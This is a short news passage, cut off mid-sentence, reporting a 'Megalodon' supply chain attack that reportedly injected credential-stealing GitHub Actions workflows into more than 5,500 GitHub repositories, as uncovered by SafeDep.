A large-scale software supply chain attack dubbed “Megalodon” has compromised more than 5,500 repositories on GitHub, raising fresh concerns about the growing abuse of automated development pipelines and GitHub Actions workflows. The incident, uncovered by SafeDep, involved thousands of malicious commits that injected credential-stealing payloads into repositories over a short period of time. 

According to researchers, the Megalodon campaign targeted repositories through automated commits that inserted malicious GitHub Actions workflows capable of harvesting sensitive credentials, cloud access keys, API tokens, and other secrets stored within continuous integration and continuous delivery (...